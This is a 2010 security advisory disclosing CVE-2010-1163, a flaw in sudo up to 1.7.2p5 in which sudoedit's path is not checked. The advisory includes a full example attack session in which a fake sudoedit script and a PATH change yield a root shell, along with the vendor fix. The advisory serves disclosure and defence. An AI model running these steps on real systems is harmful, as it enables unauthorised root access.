Sudo 1.7.2p5 Local Privilege Escalation

`Security Advisory @ Mediaservice.net Srl  
(#02, 19/04/2010) Data Security Division  
  
Title: sudoedit local privilege escalation through PATH manipulation  
Application: sudo <= 1.7.2p5  
Platform: Linux, maybe others  
Description: A local user with permission to run the sudoedit pseudo-command   
can gain root privileges, through manipulation of the PATH   
environment variable.  
Authors: Valerio Costamagna <[email protected]>  
Maurizio Agazzini <[email protected]>  
Vendor Status: sudo team notified on 26/03/2010  
CVE Candidate: The Common Vulnerabilities and Exposures project has assigned  
the name CVE-2010-1163 to this issue.  
References: http://lab.mediaservice.net/advisory/2010-02-sudo.txt  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1163  
http://www.sudo.ws/sudo/alerts/sudoedit_escalate2.html  
  
1. Abstract.  
  
While writing an article about the vulnerability outlined in CVE-2010-0426, we  
found a distinct security flaw, also related to the sudoedit pseudo-command.  
Specifically, the path component of sudoedit is not checked correctly. This   
can be easily exploited by a local user with permission to run sudoedit, in   
order to execute arbitrary commands as root.  
  
2. Example Attack Session.  
  
inode@pandora:~$ echo "/bin/sh" > sudoedit  
inode@pandora:~$ /usr/bin/chmod +x sudoedit  
inode@pandora:~$ id  
uid=1000(inode) gid=100(users) groups=100(users)  
inode@pandora:~$ export PATH=.  
inode@pandora:~$ /usr/bin/sudo sudoedit /etc/hosts  
Password:  
sh-3.1# /usr/bin/id  
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),  
10(wheel),11(floppy),17(audio),18(video),19(cdrom),26(tape),83(plugdev),84(power),  
86(netdev),93(scanner)  
sh-3.1#  
  
3. Affected Platforms.  
  
All vendors supporting sudo <= 1.7.2p5 are affected. Exploitation of this  
vulnerability requires that the /etc/sudoers file be configured to allow the  
attacker to run sudoedit.  
  
4. Fix.  
  
On April 9th 2010, version 1.7.2p6 has been relased by the sudo team, which  
fixes the described vulnerability.  
  
5. Proof Of Concept.  
  
See Example Attack Session above.  
  
Copyright (c) 2010 @ Mediaservice.net Srl. All rights reserved.  
`